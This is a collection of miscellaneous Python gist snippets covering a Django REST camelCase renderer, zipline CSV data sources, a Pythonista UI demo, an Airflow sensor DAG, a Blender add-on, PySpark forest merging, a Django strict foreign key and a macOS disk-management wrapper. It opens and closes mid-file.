print "interfacenumber, alternatesetting: " + str(intf.bInterfaceNumber) + ',' + str(intf.bAlternateSetting)
for ep in intf:
print "endpointaddress: " + str(ep.bEndpointAddress)
#probe()
main()
```
#### File: hard-gists/5881137/snippet.py
```python
import re
from rest_framework import serializers, renderers, parsers
class JSONRenderer(renderers.JSONRenderer):
def render(self, data, *args, **kwargs):
if data:
data = recursive_key_map(underscore_to_camelcase, data)
return super(JSONRenderer, self).render(data, *args, **kwargs)
class JSONParser(parsers.JSONParser):
def parse(self, *args, **kwargs):
obj = super(JSONParser, self).parse(*args, **kwargs)
return recursive_key_map(camelcase_to_underscore, obj)
def underscore_to_camelcase(word, lower_first=True):
result = ''.join(char.capitalize() for char in word.split('_'))
if lower_first:
return result[0].lower() + result[1:]
else:
return result
_first_cap_re = re.compile('(.)([A-Z][a-z]+)')
_all_cap_re = re.compile('([a-z0-9])([A-Z])')
# http://stackoverflow.com/a/1176023
def camelcase_to_underscore(word):
s1 = _first_cap_re.sub(r'\1_\2', word)
return _all_cap_re.sub(r'\1_\2', s1).lower()
def recursive_key_map(function, obj):
if isinstance(obj, dict):
new_dict = {}
for key, value in obj.iteritems():
if isinstance(key, basestring):
key = function(key)
new_dict[key] = recursive_key_map(function, value)
return new_dict
if hasattr(obj, '__iter__'):
return [recursive_key_map(function, value) for value in obj]
else:
return obj
```
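A minimal sketch of wiring these classes into Django REST Framework settings. The module path `myapp.renderers` is an assumption for illustration; point it at wherever the classes above actually live.
```python
# settings.py -- hypothetical module path for the gist's JSONRenderer/JSONParser
REST_FRAMEWORK = {
    'DEFAULT_RENDERER_CLASSES': ('myapp.renderers.JSONRenderer',),
    'DEFAULT_PARSER_CLASSES': ('myapp.renderers.JSONParser',),
}
```
With this in place, outgoing responses are rendered with camelCase keys and incoming JSON is converted back to snake_case before it reaches the serializers.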
#### File: hard-gists/5886984/snippet.py
```python
import pandas as pd
from zipline.gens.utils import hash_args
from zipline.sources.data_source import DataSource
import datetime
import csv
import numpy as np
def get_time(time_str):
time_array = map(int, time_str.split(":"))
assert len(time_array) == 2
assert time_array[0] < 24 and time_array[1] < 61
return datetime.time(time_array[0], time_array[1])
def gen_ts(date, time):
return pd.Timestamp(datetime.datetime.combine(date, time))
class DatasourceCSVohlc(DataSource):
""" expects dictReader for a csv file
with the following columns in the header
dt, symbol, open, high, low, close, volume
dt expected in ISO format and order does not matter"""
def __init__(self, data, **kwargs):
assert isinstance(data, csv.DictReader)
self.data = data
# Unpack config dictionary with default values.
if 'symbols' in kwargs:
self.sids = kwargs.get('symbols')
else:
self.sids = None
self.tz_in = kwargs.get('tz_in', "US/Eastern")
self.start = pd.Timestamp(np.datetime64(kwargs.get('start')))
self.start = self.start.tz_localize('utc')
self.end = pd.Timestamp(np.datetime64(kwargs.get('end')))
self.end = self.end.tz_localize('utc')
start_time_str = kwargs.get("start_time", "9:30")
end_time_str = kwargs.get("end_time", "16:00")
self.start_time = get_time(start_time_str)
self.end_time = get_time(end_time_str)
self._raw_data = None
self.arg_string = hash_args(data, **kwargs)
@property
def instance_hash(self):
return self.arg_string
def raw_data_gen(self):
previous_ts = None
for row in self.data:
dt64 = pd.Timestamp(np.datetime64(row["dt"]))
ts = pd.Timestamp(dt64).tz_localize(self.tz_in).tz_convert('utc')
if ts < self.start or ts > self.end:
continue
if previous_ts is None or ts.date() != previous_ts.date():
start_ts = gen_ts(ts.date(), self.start_time)
end_ts = gen_ts(ts.date(), self.end_time)
volumes = {}
price_volumes = {}
sid = row["symbol"]
if self.sids is None or sid in self.sids:
if sid not in volumes:
volumes[sid] = 0
price_volumes[sid] = 0
if ts < start_ts or ts > end_ts:
continue
event = {"sid": sid, "type": "TRADE", "symbol": sid}
cols = ["open", "high", "low", "close"]
event["dt"] = ts
event["price"] = float(row["close"])
event["volume"] = row["volume"]
volumes[sid] += float(event["volume"])
price_volumes[sid] += event["price"] * event["volume"]
event["vwap"] = price_volumes[sid] / volumes[sid]
for field in cols:
event[field] = row[field]
yield event
previous_ts = ts
@property
def raw_data(self):
if not self._raw_data:
self._raw_data = self.raw_data_gen()
return self._raw_data
@property
def mapping(self):
return {
'sid': (lambda x: x, 'sid'),
'dt': (lambda x: x, 'dt'),
'open': (float, 'open'),
'high': (float, 'high'),
'low': (float, 'low'),
'close': (float, 'close'),
'price': (float, 'price'),
'volume': (int, 'volume'),
'vwap': (lambda x: x, 'vwap')
}
class DataSourceCSVSignal(DataSource):
""" expects dictReader for a csv file in form with header
dt, symbol, signal_name
dt expected in ISO format"""
def __init__(self, data, **kwargs):
assert isinstance(data, csv.DictReader)
self.data = data
# Unpack config dictionary with default values.
if 'symbols' in kwargs:
self.sids = kwargs.get('symbols')
else:
self.sids = None
self.start = pd.Timestamp(np.datetime64(kwargs.get('start'))).tz_localize('utc')
self.end = pd.Timestamp(np.datetime64(kwargs.get('end'))).tz_localize('utc')
# signal_name selects which csv column holds the signal value
self.signal_name = kwargs.get('signal_name')
self.tz_in = kwargs.get('tz_in', "US/Eastern")
self.start_time = get_time(kwargs.get("start_time", "9:30"))
self.end_time = get_time(kwargs.get("end_time", "16:00"))
self.arg_string = hash_args(data, **kwargs)
self._raw_data = None
@property
def instance_hash(self):
return self.arg_string
def raw_data_gen(self):
previous_ts = None
for row in self.data:
# here is the group_node referring to our root
dt64 = np.datetime64(row["dt"])
ts = pd.Timestamp(dt64).tz_localize(self.tz_in).tz_convert('utc')
if ts < self.start or ts > self.end:
continue
if previous_ts is None or ts.date() != previous_ts.date():
start_ts = gen_ts(ts.date(), self.start_time)
end_ts = gen_ts(ts.date(), self.end_time)
sid = row["symbol"]
if self.sids is None or sid in self.sids:
event = {"sid": sid, "type": "CUSTOM", "dt": ts,
"signal": row[self.signal_name]}
yield event
previous_ts = ts
@property
def raw_data(self):
if not self._raw_data:
self._raw_data = self.raw_data_gen()
return self._raw_data
@property
def mapping(self):
return {
'sid': (lambda x: x, 'sid'),
'dt': (lambda x: x, 'dt'),
'signal': (lambda x: x, 'signal'),
}
```
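A usage sketch for the OHLC source above, assuming a local `bars.csv` with the header `dt, symbol, open, high, low, close, volume`; the file name and symbol are made up for illustration.
```python
import csv
# Hypothetical input file with columns: dt, symbol, open, high, low, close, volume
reader = csv.DictReader(open('bars.csv'))
source = DatasourceCSVohlc(reader,
                           symbols=['SPY'],        # hypothetical symbol filter
                           start='2013-06-24',     # parsed via np.datetime64
                           end='2013-06-25',
                           start_time='9:30',
                           end_time='16:00',
                           tz_in='US/Eastern')
events = list(source.raw_data)  # TRADE events carrying dt, sid, price, vwap and ohlc fields
```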
#### File: hard-gists/5953776/snippet.py
```python
from Hydrogen import *
from HydrogenLayouts import HColumnLayout, HBarLayout, HWindowLayout
from time import localtime
#
# A Window base class to house the Demo Components
#
class DemoWindow(HContainer):
def __init__(self, title='Title'):
HContainer.__init__(self)
self.layout = HWindowLayout(self)
self.add_bars(title)
def add_bars(self, title):
titleBarInfos = (
(title, 'move', 'top'),
('Status Bar', 'resize', 'bottom'))
for titleBarInfo in titleBarInfos:
title_bar = HText(titleBarInfo[0])
title_bar.id = titleBarInfo[1]
title_bar.ignores_touches = False
title_bar.touch_listeners.append(self.touch_listener)
self.add_component(title_bar, titleBarInfo[2])
def touch_listener(self, comp, type, touch):
if type == 'began':
self.get_scene().to_front(self)
if type == 'moved':
if comp.id == 'move':
x_new = self.bounds.x + (touch.location.x - touch.prev_location.x)
y_new = self.bounds.y + (touch.location.y - touch.prev_location.y)
self.bounds = Rect(x_new, y_new, self.bounds.w, self.bounds.h)
elif comp.id == 'resize':
x_move = touch.location.x - touch.prev_location.x
y_move = touch.location.y - touch.prev_location.y
w = self.bounds.w + x_move
h = self.bounds.h - y_move
y = self.bounds.y + y_move
self.bounds = Rect(self.bounds.x, y, w, h)
self.do_layout()
# Example widget to display the current time
class HClock(HText):
def __init__(self):
HText.__init__(self,'00:00:00')
self.sec = -1
self.laf_prefix = 'Clock '
def draw_foreground(self, x, y):
t = localtime()
if t.tm_sec != self.sec:
self.sec = t.tm_sec
self.set_text('{:02d}:{:02d}:{:02d}'.format(t.tm_hour, t.tm_min, t.tm_sec))
HText.draw_foreground(self, x, y)
# Progress bar set to update with the seconds of the clock
class DemoProgressBar(HProgressBar):
def draw_foreground(self, x, y):
t = localtime()
self.value = t.tm_sec / 59.0
HProgressBar.draw_foreground(self, x, y)
# Example widget to display the average FPS.
class HFramesPerSecond(HText):
def __init__(self):
HText.__init__(self, 'FPS = 00.0')
self.laf_prefix = 'FPS '
self.SAMPLE_FRAMES = 30
self.delta = 0
self.frame = 0
self.fps = 0.0
def draw_foreground(self, x, y):
self.update_fps()
HText.draw_foreground(self, x, y)
def update_fps(self):
hscene = self.get_scene()
if(hscene is not None):
self.delta += hscene.dt
self.frame += 1
if(self.frame == self.SAMPLE_FRAMES):
self.fps = self.SAMPLE_FRAMES / self.delta
self._text = 'FPS = {:.1f}'.format(self.fps)
self._img = None
self.frame = 0
self.delta = 0
# Instructions to fade out over time
class HDemoInstructions(HText):
def __init__(self):
HText.__init__(self, 'To get started, drag the left bar onto the screen.')
self.laf_prefix = 'Instructions '
self.alpha = 1.0
self.delay = 3.0
self.fade = 3.0
def set_alpha(self):
hscene = self.get_scene()
if(hscene is not None):
secs = hscene.t
if(secs > self.delay + self.fade):
self.alpha = 0.0
self.is_visible = False
elif(secs > self.delay):
self.alpha = (self.fade + self.delay - secs) / self.fade
else:
self.alpha = 1.0
def h_draw(self, x_offset, y_offset):
self.set_alpha()
r, g, b, a = self.laf['Background']
self.laf['Background'] = (r, g, b, self.alpha)
r, g, b, a = self.laf['Border']
self.laf['Border'] = (r, g, b, self.alpha)
r, g, b, a = self.laf['Foreground']
self.laf['Foreground'] = (r, g, b, self.alpha)
HText.h_draw(self, x_offset, y_offset)
class Demo(HScene):
def setup(self):
self.add_local_laf()
self.add_instructions()
self.text_demo = self.add_text_demo()
self.image_demo = self.add_image_demo()
self.slider_demo = self.add_slider_demo()
self.switch_demo = self.add_switch_demo()
self.progress_demo = self.add_progress_demo()
self.lookandfeel_demo = self.add_lookandfeel_demo()
self.clock = self.add_clock()
self.fps = self.add_fps()
self.side_bar = self.add_side_bar()
def add_local_laf(self):
LAF['Clock Font Size'] = 20
LAF['Clock Foreground'] = (0.50, 0.00, 0.00, 1.00)
LAF['Clock Show Background'] = False
LAF['Clock Show Border'] = False
LAF['FPS Font Size'] = 20
LAF['FPS Foreground'] = (0.00, 0.50, 0.00, 1.00)
LAF['FPS Show Background'] = False
LAF['FPS Show Border'] = False
LAF['Instructions Font Size'] = 30
LAF['Instructions Show Background'] = False
LAF['Instructions Show Border'] = False
LAF['Top Selection Bar Background'] = (1.00, 1.00, 1.00, 1.00)
LAF['Top Selection Bar Shape'] = round_top_rect
LAF['Bottom Selection Bar Background'] = (1.00, 1.00, 1.00, 1.00)
LAF['Bottom Selection Bar Shape'] = round_bottom_rect
LAF['Selection Bar Background'] = (1.00, 1.00, 1.00, 1.00)
LAF['Selection Bar Shape'] = rectangle
LAF['Spacer Show Background'] = False
LAF['Spacer Show Border'] = False
def add_instructions(self):
instructions = HDemoInstructions()
self.add_component(instructions)
instructions.bounds.x = (self.bounds.w - instructions.bounds.w) / 2
instructions.bounds.y = (self.bounds.h - instructions.bounds.h) / 2
def add_text_demo(self):
panel = HContainer()
panel.insets = HInset(10, 10, 5, 5)
panel.layout = HColumnLayout(panel)
panel.layout.pad = HInset(0,0,-0.5,0)
panel.layout.fill_width = False
lines = '''Demonstration text components
Simple control that will write text label on screen
Choose any font available in Pythonista
And any font size or colour
Borders and Backgrounds can be configured
with the Look-And-Feel
Just like all of the other components'''
for line in lines.splitlines():
panel.add_component(HText(line.strip()))
window = DemoWindow('HText Components')
window.add_component(panel, 'center')
window.is_visible = False
self.add_component(window)
panel.laf['Shape'] = rectangle
return window
def add_image_demo(self):
img_control = HImage()
img_control.set_image('Test_Mandrill', Size(265, 256))
img_control.stretch = True
window = DemoWindow('HImage Component')
window.add_component(img_control)
window.is_visible = False
self.add_component(window)
return window
def add_slider_demo(self):
panel = HContainer()
panel.insets = HInset(10, 10, 0, 10)
panel.layout = HColumnLayout(panel)
panel.layout.pad = HInset(0, 0, 4, 0)
panel.add_component(HText('Sliders Adjust Background'))
r, g, b = self.laf['Background']
slider = HSlider()
slider.id = 'red'
slider.value = r
slider.change_listeners.append(self.slider_moved)
panel.add_component(slider)
slider = HSlider()
slider.id = 'green'
slider.value = g
slider.change_listeners.append(self.slider_moved)
panel.add_component(slider)
slider = HSlider()
slider.id = 'blue'
slider.value = b
slider.change_listeners.append(self.slider_moved)
panel.add_component(slider)
self.slider_text = HText()
self.slider_moved(slider)
panel.add_component(self.slider_text)
window = DemoWindow('HSlider Components')
window.add_component(panel)
window.is_visible = False
self.add_component(window)
panel.laf['Shape'] = rectangle
return window
def add_switch_demo(self):
clock = HClock()
clock.is_visible = False
self.add_component(clock)
clock.bounds.x = (self.bounds.w - clock.bounds.w) / 2
clock.bounds.y = self.bounds.h - (2 * clock.bounds.h)
fps = HFramesPerSecond()
fps.is_visible = False
self.add_component(fps)
fps.bounds.x = (self.bounds.w - fps.bounds.w) / 2
fps.bounds.y = fps.bounds.h
panel = HContainer()
panel.insets = HInset(10, 10, 0, 10)
panel.layout = HColumnLayout(panel)
panel.layout.pad = HInset(0,0,2,2)
panel.layout.fill_width = False
switch_clock = HSwitch()
switch_clock.id = clock
switch_clock.change_listeners.append(self.switch_flipped)
switch_fps = HSwitch()
switch_fps.id = fps
switch_fps.change_listeners.append(self.switch_flipped)
panel.add_component(HText('Use Switches to control On/Off functions'))
panel.add_component(HText('Activate Time Display'))
panel.add_component(switch_clock)
panel.add_component(HText('Activate Frame Rate Display'))
panel.add_component(switch_fps)
window = DemoWindow('HSwitch Components')
window.add_component(panel)
window.is_visible = False
self.add_component(window)
panel.laf['Shape'] = rectangle
return window
def add_progress_demo(self):
panel = HContainer()
panel.layout = HColumnLayout(panel)
panel.insets = HInset(10, 10, 0, 10)
panel.add_component(HText('Progress bar linked to clock seconds'))
panel.add_component(DemoProgressBar())
window = DemoWindow('HProgressBar Component')
window.add_component(panel)
window.is_visible = False
self.add_component(window)
panel.laf['Shape'] = rectangle
return window
def set_laf_demo_labels(self):
self.font_label.set_text(LAF["Font"])
self.font_size_label.set_text(str(LAF["Font Size"]))
self.font_colour_label.set_text(str(LAF["Text Foreground"]))
self.shape_label.set_text(LAF["Shape"].__name__)
self.radius_label.set_text(str(LAF["Edge Radius"]))
self.background_label.set_text(str(LAF["Background"]))
self.border_label.set_text(str(LAF["Border"]))
self.border_on_label.set_text(str(LAF["Show Border"]))
self.border_width_label.set_text(str(LAF["Border Width"]))
def set_laf_1(self):
LAF["Shape"] = round_rect
LAF["Text Foreground"] = (0.00, 0.00, 0.00, 1.00)
LAF["Button Foreground"] = (0.00, 0.00, 0.00, 1.00)
LAF["Background"] = (0.90, 0.90, 0.90, 1.00)
LAF["Button Background"] = (0.80, 0.80, 0.80, 1.00)
LAF["Button Selected"] = (0.60, 0.60, 0.60, 1.00)
LAF["Border"] = (0.50, 0.50, 0.50, 1.00)
LAF["Border Width"] = 1
LAF["Font"] = 'AppleSDGothicNeo-Medium'
LAF["Font Size"] = 16
LAF["Edge Radius"] = 6
LAF["Show Background"] = True
LAF["Show Border"] = True
def set_laf_2(self):
LAF["Shape"] = rectangle
LAF["Text Foreground"] = (0.25, 0.00, 0.25, 1.00)
LAF["Button Foreground"] = (0.25, 0.00, 0.25, 1.00)
LAF["Background"] = (0.30, 0.30, 0.50, 1.00)
LAF["Button Background"] = (0.50, 0.75, 1.00, 1.00)
LAF["Button Selected"] = (0.25, 0.40, 0.50, 1.00)
LAF["Border"] = (0.15, 0.15, 0.30, 1.00)
LAF["Border Width"] = 3
LAF["Font"] = 'Avenir-Heavy'
LAF["Font Size"] = 14
LAF["Edge Radius"] = 8
LAF["Show Background"] = True
LAF["Show Border"] = True
def set_laf_3(self):
LAF["Shape"] = round_right_rect
LAF["Text Foreground"] = (0.00, 0.25, 0.00, 1.00)
LAF["Text Foreground"] = (0.00, 0.25, 0.00, 1.00)
LAF["Background"] = (0.70, 0.90, 0.70, 1.00)
LAF["Button Background"] = (0.60, 0.80, 0.80, 1.00)
LAF["Button Selected"] = (0.40, 0.60, 0.60, 1.00)
LAF["Border"] = (0.50, 0.50, 0.50, 1.00)
LAF["Border Width"] = 0
LAF["Font"] = 'Futura-Medium'
LAF["Font Size"] = 18
LAF["Edge Radius"] = 8
LAF["Show Background"] = True
LAF["Show Border"] = False
def add_lookandfeel_demo(self):
buttonInfos = (
(self.set_laf_1, 'left'),
(self.set_laf_2, 'center'),
(self.set_laf_3, 'right'))
self.font_label = HText()
self.font_size_label = HText()
self.font_colour_label = HText()
self.shape_label = HText()
self.radius_label = HText()
self.background_label = HText()
self.border_label = HText()
self.border_on_label = HText()
self.border_width_label = HText()
barInfos = (
('Top ', 'Font Name', self.font_label),
('', 'Font Size', self.font_size_label),
('', 'Font Colour', self.font_colour_label),
('', 'Shape', self.shape_label),
('', 'Radius', self.radius_label),
('', 'Background', self.background_label),
('', 'Border', self.border_label),
('', 'Border On', self.border_on_label),
('Bottom ', 'Border Width', self.border_width_label))
panel = HContainer()
panel.layout = HColumnLayout(panel)
panel.layout.pad = HInset(0, 0, -0.5, -0.5)
panel.insets = HInset(10, 10, 10, 10)
panel.add_component(HText("A sample of the LookAndFeel properties"))
bar = HContainer()
bar.layout = HBarLayout(bar)
bar.layout.pad = HInset(5, 5, 0, 0)
bar.insets = HInset(5,5,10,10)
for i, buttonInfo in enumerate(buttonInfos):
button = HButton('Sample L&F {}'.format(i))
button.id = buttonInfo[0]
button.click_listeners.append(self.laf_button_clicked)
bar.add_component(button, buttonInfo[1])
panel.add_component(bar)
spacer = HComponent()
spacer.laf_prefix = "Spacer "
spacer.preferred_size = Size(10, 10)
panel.add_component(spacer)
for barInfo in barInfos:
bar = HContainer()
bar.laf_prefix = '{}Selection Bar '.format(barInfo[0])
bar.layout = HBarLayout(bar)
bar.add_component(HText(barInfo[1]), 'left')
bar.add_component(barInfo[2], 'right')
panel.add_component(bar)
self.set_laf_demo_labels()
window = DemoWindow('Look and Feel Demo')
window.add_component(panel)
window.is_visible = False
self.add_component(window)
panel.laf['Shape'] = rectangle
return window
def add_simple_window(self, inComponent, inTitle):
panel = HContainer()
panel.layout = HColumnLayout(panel)
panel.add_component(inComponent)
window = DemoWindow(inTitle)
window.add_component(panel)
window.is_visible = False
self.add_component(window)
return window
def add_clock(self):
return self.add_simple_window(HClock(), 'Clock')
def add_fps(self):
return self.add_simple_window(HFramesPerSecond(), 'Frames Per Second')
def add_side_bar(self):
buttonInfos = (
('Text Component Demo', self.text_demo),
('Image Component Demo', self.image_demo),
('Slider Component Demo', self.slider_demo),
('Switch Component Demo', self.switch_demo),
('Progress Bar Component Demo', self.progress_demo),
('Look and Feel Demo', self.lookandfeel_demo),
('Sample Clock Component', self.clock),
('Sample Frames Per Second Component', self.fps))
side_bar = HContainer()
side_bar.insets = HInset(20, 20, 20, 20)
side_bar.layout = HColumnLayout(side_bar)
side_bar.layout.pad = HInset(0, 0, 4, 0)
for buttonInfo in buttonInfos:
button = HButton(buttonInfo[0])
button.id = buttonInfo[1]
button.click_listeners.append(self.button_clicked)
side_bar.add_component(button)
self.add_component(side_bar)
side_bar.laf['Shape'] = round_right_rect
y = (self.bounds.h - side_bar.bounds.h) / 2
x = -side_bar.bounds.w + 20
side_bar.bounds.x = x
side_bar.bounds.y = y
side_bar.touch_listeners.append(self.drag_side_bar)
return side_bar
def drag_side_bar(self, comp, type, touch):
if type == 'began':
self.get_scene().to_front(comp)
if type == 'moved':
x_new = comp.bounds.x + (touch.location.x - touch.prev_location.x)
if x_new > 0:
x_new = 0
elif x_new < -comp.bounds.w + 20:
x_new = -comp.bounds.w + 20
comp.bounds.x = x_new
def button_clicked(self, button):
comp = button.id
comp.bounds.x = (self.bounds.w - comp.bounds.w) / 2
comp.bounds.y = (self.bounds.h - comp.bounds.h) / 2
comp.is_visible = not comp.is_visible
self.to_front(comp)
def laf_button_clicked(self, button):
button.id.__call__()
self.set_laf_demo_labels()
self.load_lookandfeel()
def slider_moved(self, slider):
r, g, b = self.laf['Background']
if(slider.id == 'red'):
r = slider.value
elif(slider.id == 'green'):
g = slider.value
elif(slider.id == 'blue'):
b = slider.value
self.laf['Background'] = (r, g, b)
self.slider_text.set_text('Colour ({:.2f}, {:.2f}, {:.2f})'.format(r, g, b))
def switch_flipped(self, switch):
switch.id.is_visible = switch.is_selected
def to_front(self, comp):
self.components.remove(comp)
self.components.append(comp)
run(Demo())
```
#### File: hard-gists/5b769cd2a86bb1270188ffa423941d5f/snippet.py
```python
from airflow.operators.http_operator import SimpleHttpOperator
from airflow.operators.postgres_operator import PostgresOperator
from airflow.operators.subdag_operator import SubDagOperator
from airflow.operators.sensors import SqlSensor
from airflow.hooks.postgres_hook import PostgresHook
from airflow.operators.python_operator import PythonOperator
from airflow.models import Variable, DAG
from datetime import datetime, timedelta
default_args = {
'owner': '@tmarthal',
'start_date': datetime(2017, 2, 1),
'depends_on_past': False,
'retries': 1,
'retry_delay': timedelta(minutes=5),
}
##
## The DAG for the application audience job to run
##
dag = DAG('sensor_dag_creation_inoperator',
default_args=default_args,
schedule_interval = '*/5 * * * *' # every five minutes
)
dag.doc = """
Simple http call which triggers when a row shows up in a database
"""
def response_check(response):
"""
Dumps the http response and returns True when the http call status is 200/success
"""
print("checking the reponse from the app")
print(response.content)
return response.status_code == 200
def process_new_accounts(ds, **kwargs):
"""
The sensor has detected new ids to process, so we call the http operator for each
"""
select_sql = "SELECT id from audiences where created_at > '{ds}'".format(ds=ds)
print("running select sql {}".format(select_sql))
pg_hook = PostgresHook(postgres_conn_id='letterpress-app')
connection = pg_hook.get_conn()
cursor = connection.cursor()
cursor.execute(select_sql)
account_ids = cursor.fetchall()
for account_id in account_ids:
# Create a sub-dag with each new id
# the child dag name
export_account_task_name = 'task_process_account_%s' % account_id
print("starting task: {}".format(export_account_task_name))
export_account_dag = DAG(
dag_id=export_account_task_name,
default_args=default_args,
schedule_interval='*/5 * * * *' # '@once'
)
## This hits the account export url, _endpoint/account/export?id={ACCOUNT_ID}&token={AUTH_TOKEN}
account_export_endpoint_task = SimpleHttpOperator(
task_id='account_export_endpoint_task_%s' % (account_id),
http_conn_id='application',
method='GET',
endpoint='_endpoint/account/export',
data={"id": "{}".format(account_id), "token": Variable.get("APPLICATION_ACCESS_TOKEN")}, # http params
response_check=response_check, # will retry based on default_args if it fails
dag=export_account_dag)
print("Created account processing DAG {}".format(export_account_dag.dag_id))
# register the dynamically created DAG in the global namespace?
globals()[export_account_task_name] = export_account_dag
return account_ids
sensor = SqlSensor(
task_id='account_creation_check',
conn_id='account-database',
poke_interval=600, #do the select every 600 seconds, 5 minutes
sql="SELECT id from accounts where created_at > '{{ds}}' LIMIT 1",
dag=dag
)
process_new_accounts_task = PythonOperator(task_id='process_new_accounts',
provide_context=True,
python_callable=process_new_accounts,
dag=dag)
sensor >> process_new_accounts_task
```
#### File: hard-gists/5c973ec1b5ab2e387646/snippet.py
```python
import bpy
from bpy.app.handlers import persistent
bl_info = {
"name": "Playback Once",
"author": "<NAME>",
"version": (1, 0, 0),
"blender": (2, 67, 3),
"location": "",
"description": "Playback once.",
"warning": "",
"wiki_url": "",
"tracker_url": "",
"category": "Animation"}
@persistent
def stopPlaybackAtEnd(scene):
if scene.frame_current >= scene.frame_end:
bpy.ops.screen.animation_cancel()
def register():
bpy.app.handlers.frame_change_pre.append(stopPlaybackAtEnd)
def unregister():
bpy.app.handlers.frame_change_pre.remove(stopPlaybackAtEnd)
if __name__ == "__main__":
register()
```
#### File: hard-gists/5dcd725d464858e9082f/snippet.py
```python
from pyspark import SparkConf, SparkContext
from sklearn.datasets import make_classification
from sklearn.ensemble import ExtraTreesClassifier
import pandas as pd
import numpy as np
conf = (SparkConf()
.setMaster("local[*]")
.setAppName("My app")
.set("spark.executor.memory", "1g"))
sc = SparkContext(conf = conf)
# Build a classification task using 3 informative features
X, y = make_classification(n_samples=12000,
n_features=10,
n_informative=3,
n_redundant=0,
n_repeated=0,
n_classes=2,
random_state=0,
shuffle=False)
# or read from a file (for instance)
#df = pd.read_csv('data.csv', sep=' ', header=None)
#X = df[[1,2,3,4,5,6,7,8,9,10]].as_matrix()
#y = df[[0]][0].tolist()
# Partition data
def dataPart(X, y, start, stop): return dict(X=X[start:stop, :], y=y[start:stop])
def train(data):
X = data['X']
y = data['y']
return ExtraTreesClassifier(n_estimators=100,random_state=0).fit(X,y)
# Merge 2 Models
import copy
def merge(left,right):
new = copy.deepcopy(left)
new.estimators_ += right.estimators_
new.n_estimators = len(new.estimators_)
return new
data = [dataPart(X, y, 0, 4000), dataPart(X,y,4000,8000), dataPart(X,y,8000,12000)]
forest = sc.parallelize(data).map(train).reduce(merge)
importances = forest.feature_importances_
std = np.std([tree.feature_importances_ for tree in forest.estimators_],
axis=0)
indices = np.argsort(importances)[::-1]
# Print the feature ranking
print("Feature ranking:")
for f in range(10):
print("%d. feature %d (%f)" % (f + 1, indices[f], importances[indices[f]]))
```
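Because `merge` simply concatenates the fitted trees, the reduced object is an ordinary `ExtraTreesClassifier` with 300 estimators, so the normal scikit-learn API applies. A quick, purely illustrative sanity check:
```python
# The merged 300-tree forest predicts and scores like any fitted sklearn model
preds = forest.predict(X[:5])
print("predictions on first 5 rows: %s" % preds)
print("training accuracy of merged forest: %.3f" % forest.score(X, y))
```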
#### File: hard-gists/5eaed8a5c299e5282d066a1fbc03152c/snippet.py
```python
from __future__ import unicode_literals
from django.db import models
from django.db.models.fields.related_descriptors import ForwardManyToOneDescriptor # noqa
class RelationNotLoaded(Exception):
pass
class StrictForwardManyToOne(ForwardManyToOneDescriptor):
def __get__(self, instance, cls=None):
try:
return getattr(instance, self.cache_name)
except AttributeError:
raise RelationNotLoaded(
'Relation `{rel}` not loaded. Use `select_related` or '
'`fetch_{rel}`'.format(rel=self.field.name)
)
def explicit_get(self, instance, cls=None):
return super(StrictForwardManyToOne, self).__get__(instance, cls)
class StrictForeignKey(models.ForeignKey):
def contribute_to_class(self, cls, name, **kwargs):
super(StrictForeignKey, self).contribute_to_class(cls, name, **kwargs)
# Override the descriptor defined by ForeignObject
descriptor = StrictForwardManyToOne(self)
setattr(cls, self.name, descriptor)
# Add a method so you don't always have to use select_related
fetch_name = 'fetch_{rel}'.format(rel=self.name)
setattr(cls, fetch_name, lambda inst: descriptor.explicit_get(inst))
# Create your models here.
class Author(models.Model):
name = models.TextField()
class Book(models.Model):
title = models.TextField()
author = StrictForeignKey(Author, on_delete=models.PROTECT, related_name='books')
```
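A short sketch of the intended behaviour; the queries are illustrative and assume the models above are migrated and populated.
```python
# Illustrative only
book = Book.objects.select_related('author').get(pk=1)
book.author          # fine: the relation was loaded eagerly
book = Book.objects.get(pk=1)
try:
    book.author      # raises RelationNotLoaded
except RelationNotLoaded:
    author = book.fetch_author()  # falls back to an explicit query
```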
#### File: hard-gists/5f1baad30024a898e9f2115ac9b0c631/snippet.py
```python
import objc
from Foundation import NSBundle
# Predefine some opaque types
DASessionRef = objc.createOpaquePointerType('DASessionRef', '^{__DASession=}', None)
DADiskRef = objc.createOpaquePointerType('DADiskRef', '^{__DADisk=}', None)
# Load DiskManagement framework classes
DiskManagment = objc.loadBundle('DiskManagment', globals(), bundle_path='/System/Library/PrivateFrameworks/DiskManagement.framework')
# Load DiskArbitration framework functions
DiskArbitration_bundle = NSBundle.bundleWithIdentifier_('com.apple.DiskArbitration')
functions = [
('DASessionCreate', '@o@'),
('DADiskGetBSDName', '*^{__DADisk=}'),
]
objc.loadBundleFunctions(DiskArbitration_bundle, globals(), functions)
class diskRef(object):
def __init__(self, dObj, controller, rawRef=False):
if rawRef:
self.cf_type = objc.objc_object(c_void_p=dObj.__pointer__)
self.ref_type = dObj
else:
self.cf_type = dObj
self.ref_type = DADiskRef(c_void_p=(dObj.__c_void_p__().value))
self.controller = controller
def __repr__(self):
return self.cf_type.__repr__()
@property
def devname(self):
return self.controller.shared.deviceNodeForDisk_error_(self.ref_type, None)
@property
def volname(self):
return self.controller.shared.volumeNameForDisk_error_(self.ref_type, None)
@property
def type(self):
return self.controller.shared.ioContentOfDisk_error_(self.ref_type, None)
@property
def facts(self):
possible = [x for x in dir(self.controller.shared) if (x.startswith('is') and x.endswith('_error_'))]
return [y for y in sorted([x.split('is',1)[-1].rsplit('_error_',1)[0] for x in possible]) if not '_' in y]
@property
def physical_store(self):
# This APFS and other disk types as well supposedly, looking at the code - like CoreStorage, SoftRAID ....
try:
results = self.controller.shared.physicalDisksForDisk_storageSystemName_error_(self.ref_type, None, None)
if results[0] is not None:
return diskRef(results[0], self.controller)
except:
pass
return None
def Is(self, factname):
if factname not in self.facts:
raise Exception('no such fact, check disk.facts')
selector = getattr(self.controller.shared, 'is' + factname + '_error_', None)
if selector is None:
raise Exception('no such fact, check disk.facts')
return (selector)(self.ref_type,None)
class diskList(object):
# This is dict-list hybrid that allows for slicing as well as lookups by dev name
def __init__(self, disks):
self._disk_list = disks[:]
self._disk_dict = dict()
for i,d in enumerate(disks):
self._disk_dict[d.devname] = d
def __iter__(self):
return iter(self._disk_list)
def __getitem__(self, index):
if isinstance(index, slice):
return self._disk_list.__getitem__(index)
elif isinstance(index, int):
return self._disk_list.__getitem__(index)
elif isinstance(index, diskRef):
# someone passed in a disk, so .. give them back the disk?
return index
return self._disk_dict[index]
def __repr__(self):
return self._disk_list.__repr__()
class diskManager(object):
def setup_managers(self):
# Create a DiskArb session
session = DASessionCreate(None)
# Get the shared disk manager
self.shared = DMManager.sharedManager()
